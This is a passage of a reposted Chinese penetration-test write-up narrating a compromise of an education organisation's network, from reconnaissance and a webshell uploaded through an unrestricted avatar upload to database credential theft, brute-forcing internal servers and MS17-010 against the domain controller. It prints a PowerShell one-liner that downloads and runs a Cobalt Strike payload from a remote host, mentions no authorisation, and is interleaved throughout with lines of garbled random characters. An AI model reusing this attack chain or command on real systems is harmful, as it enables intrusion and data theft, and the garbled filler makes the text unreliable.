|
2 ?6 O ?9 B6 A1 e4 m# z% g 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
( p5 i( u1 O5 h2 @: R* o8 l' |& p( h 7 Z y3 u4 X8 r9 T. D+ ^
8 f6 m# V# q0 H( l1 l% ` 4 y6 r" ~% r0 K, E, x' \ L: w
) d5 r" o: X" S& C* l7 S
5 \4 G/ p6 Z. s 正文8 |: G: E7 Y P
. F% Z. s: }( A0 e& a( F0 ?
9 R, C9 S9 T, D8 F2 V# q9 y9 L # M5 m4 B9 p# F
5 n+ y* O$ u5 i6 c' r, D5 `
1 X$ l: `! k& }# ~) P# Z- I `
目标:www.xxxx.com(一家教育机构) " R9 s; B8 ?# i+ g! {3 b7 z
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能! x, O' e) a, |8 I& g# W/ L
4 W: ]; M: E" ~* U9 B1 q7 ?+ \1 n, }
6 q4 C0 M# C9 ^8 h - r% m" o: l5 W+ Y
- z6 v* p9 P3 h# `& Z/ w
& W2 _" W# |9 r9 t" R9 z4 ?/ F
进行了简单的信息搜集 * _2 ]: u" P( ?' U
: n+ p+ e$ d# t2 E: U) b; \+ B/ w
$ ?7 d; `& }) B/ x , j! e4 S! \, ^# `: Q
: `/ x* W- E2 {8 e
子域名搜集+ z4 K9 C" W, b% x5 U" ^; _% K9 E
! F/ c+ H! k" v# i7 H
) N$ Q8 E# B# C) ?
3 G8 i5 i" U4 g T5 ^8 `" W3 f
% ~: L8 G2 h' P
9 p O* _$ \5 I. X
fofa找资产
; u0 o+ d! J* F7 J5 G" ? * G1 U; k6 k6 W% ~) {5 y
C+ E7 p5 G5 M7 K& h+ Q1 B1 f+ O) b
R+ b2 p. v/ w, f( c3 V
) [% U$ X" `; [( ^
8 ^! A5 Y, n5 E( @( \, O R: I) T; v/ G
* y) ?0 o) N+ v9 N+ B; ` j 一共七个资产。去重之后只有两个。
/ P+ M% U* \$ T1 t0 P 1 T. n4 |1 I8 t$ t g( B
5 N- {. |! q @8 Q/ P9 n! A8 E 9 a$ p+ P1 w7 s9 S% N$ L7 u
! B& R8 I- Z$ N4 t4 D6 U9 f! J% d$ h
目录探测
3 m5 h |( _4 `8 _9 [ : Z; m$ T: [( a7 i! n
- Z8 P3 o* w, a - g& q4 a0 N; F$ S( t& `
1 J0 L7 |( y1 ] q8 s3 ?
: M+ N& m) ^( g& ~
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 h% M* w' [' \' i: B 4 O; H$ O7 I; D) z% d Z
8 V0 `' c }! k3 y2 ` 5 t ~7 k O+ ]8 w5 p) h) z. O
3 Q4 T( T% m& c* l c 我又尝试了通过修改返回包来绕过登录界面+ {$ Y) _! ]5 c) E/ a% K
. R9 `. o; ~# {: f+ F4 s/ R% Y8 n$ [$ G
& M+ [9 ?: x. |# M7 q1 r9 r ^
3 K& d( x% l, R( a1 p @
) E _4 N9 H& t9 E6 k0 a 还是不行,尝试注入无果
0 s, c: S6 g1 N( y1 c4 D U! i, k 0 j' b: U" `2 E
: ^. I5 I, l2 B5 Y 4 w1 ?+ h, ?" Q, Z- g1 _
" S1 @/ s7 a/ Y: a* k
, X# s7 ^8 O+ Z# z5 Q; }% U5 T2 c1 E: E 不过我目录探测出了一处Spring信息泄露 " J& b7 N$ {4 H# I
; ~$ l2 _6 C, ]7 ~$ X5 z# ~8 _2 `* G: F* A( I
' |" M4 |! }9 m/ t. z
( u/ @8 _) F6 q% c' ?" E
3 c. C$ U* H! z. C
1 f4 n/ U1 Z6 J& o6 J6 e( D6 k: k& [) F
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
) |) q3 ]. ?9 I i5 f, x - W4 t3 l& [! X& D" H
4 l% u. o7 o8 R& t+ o7 M 1 {5 ?7 [- g4 Z. @8 X! x
5 @3 E) @) V" L9 a j" l0 W
. k* Y J& n! J2 H) }
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。. i: v% M; o$ p7 x4 p- f( x( a
" ?) V3 L( i% U6 D, Z% _1 T
: B- q! g: t/ \6 Q) I5 a) m4 W, l- U 5 i3 U v+ r( y! z( Q
7 O1 _, q. D: ]. B" \) C
4 b* Q3 \8 v6 P* o* M& [
获取有些师傅到这一步就手机抓包电脑测了。+ o9 ?: \" t5 X3 v7 F
5 R3 ?9 a$ @4 y6 H& e9 U: Q7 C% I9 ~. `/ L- I. ^
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
$ F) G& H( N9 o, r
# ]' c5 K" m4 t5 ?+ n% b2 A
- \1 l8 g- b/ q: ^& B. ? 其中在一个公众号发现了小程序,可以进行注册。9 U) i/ T& I! _/ [, n1 R; `
Y1 m+ N+ b" o* r" A0 [
0 H) i% b' y7 @3 a6 { 看到了头像上传,尝试上传获取WebShell
9 Z3 f; |1 q+ T b H% S+ w+ H ( x# `' U9 H1 O5 v, E) W- k
: |8 e# G+ E9 O& k4 f: V
- x! D1 g* Q& `
- o1 U+ r/ X6 }/ ^, K2 @8 N' Y' d( B, ^- h7 M0 h5 \
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
& L1 s( ]- J$ r. v* C
/ H3 u5 I( P) f) O w
! j9 Y- {5 r/ [* U; x3 A W. o; T) @! v % T1 `! j9 r; k' m+ Q4 j
5 e4 W, ~/ h4 ^6 V6 f$ a1 a- _- E# ]8 s
; W8 d1 Y2 e3 C0 M# C; y
然后上了大马
3 i9 ?6 n# V2 ~% G2 S- C + W. _' G! t/ _& l
$ F# K3 E- @$ N7 ]- `9 H
' r4 M; Y" g H# {1 s % m7 Y7 u, @; Q
1 [) g9 C- n8 R% ]/ H6 M $ n! E: g% \) ^* ~4 L5 n6 @# B9 B
4 A! @0 J# }; j9 L, ?( p2 U# c1 H, X4 h
通过翻找文件发现数据库账号密码
: W5 Q6 B5 D9 J/ M8 C* L( @8 J- o
/ n7 `- E! a7 [1 s! M' H
/ N( V5 ?- U+ ~( w8 ~
( k# S! k) c3 }: h; e& I4 M ! c g7 }* E9 a6 }
* d) A% {. N/ E& n" S1 b --内网渗透
! x! m9 Z9 C: b% E+ L " q+ x2 g7 q+ n$ k; @1 k0 k% z
) `- l, p) |6 F. m3 m$ d3 r F: z( ^ 直接通过powershell执行 cs上线2 j0 d; R R' X% [7 O
& A) M( D) X4 j8 v E
$ a+ D7 d6 i5 l. c; Z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"3 X3 @# ?' E2 {% I. D: }
1 J) m, w v# k+ m3 c
( v" {8 j2 Q& M( ]% ^5 } ' f6 q+ ~' D8 G0 R- {
# G2 J5 B0 V2 a, i" L
I# Z& n7 Y1 X" i. O 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破3 J: @$ ]# O2 H6 F6 R
2 X& i/ E7 Q( _$ S) m4 a* ^6 D+ V$ d
1 ~1 z G4 S7 J4 m" O7 U; D
( m x& v8 d! U& t6 L3 F( Y ! D. g ?% O- Z) x$ Z) L( p( g
" t9 Y) r" o# ?4 Y% C; R 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 1 n( N/ e7 } M7 y7 b' J
& b5 I. V4 n G' i% `' Z* V 3 P# W8 o$ S/ h( d" a/ T. o
5 Q1 Y3 x2 A/ N1 Q
8 D' B( F0 G+ y' _0 @7 k u' C8 E5 l* C; F4 c2 t
" L0 @2 W! N, D0 l0 D% y/ ?. O8 N
[4 C. P7 B9 I/ h5 w* d, k; V) D/ C
2 n7 T2 r7 b" P8 x0 x. W n6 q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 & |; @1 o* g4 n8 Z/ f6 M6 D c: F0 f/ a
Z& v; u! p! s7 u
( k! c" ]' G. ?# i" Y - H$ ?% X! o, L8 e# R1 W o+ g
' f/ A$ _' W( H, ~" F: x# C
) @$ L& Q' `" t( t
3 z* d0 x& w3 V- @0 I% P |+ U, D. O+ o" b; P" Q/ U
% H* i: l) U; z$ A; r- B' X! |+ c" I
8 p, n$ u4 Z' v* J
% u2 K& d9 J! U/ x/ \7 Q $ X( M: G1 B3 X9 a8 P; }3 ?
) N, ]1 @* X |3 r7 q8 g# I
: d4 c% r* s: m) [: [( n + c% A5 A6 K: o6 d- m+ k
$ z. V; i0 e" O1 m9 }" w6 ?) n) h( g 小结+ S; _4 V, f" p. s' X0 C
d& q y2 R6 P- Z* S
+ c) o$ c. g% ` z9 o& D3 G$ G
; U* Q% u% f8 A0 p5 R5 U( t , T, k" U1 [4 K' ], I) M6 R2 W' L
3 P9 B# U) y; c Y
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!6 ]$ h& M0 E" }9 G, y
! S' T0 Z S+ X" e2 k# i4 H: w$ F$ Z6 i/ r6 x* i* H/ l
: E& Q7 k: k! H" n" w# A " b# A$ g- O8 O8 V$ G
: H# Z# x1 x: G. {/ q8 V( A
-
- W- |6 j- G9 r4 j , v' Z: t/ }1 X
% T- a8 G* b; V - " [+ z1 A4 W7 ^& _& [5 A. H- ?6 [1 o4 a
! x( |# a6 I" y0 O; P7 v
' J9 t/ t, R Z3 k) z U ) v5 _% H1 ^) t
, Q4 N' A' C) H* U4 c) \ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
& m5 Q2 X: E% h) H! O x
# u5 a7 g7 c8 F. q9 n+ L, ?& U! F9 [6 y, ]- P4 n7 @5 U7 f- W: r
0 k; ~$ ^" u& U+ {5 x5 e
|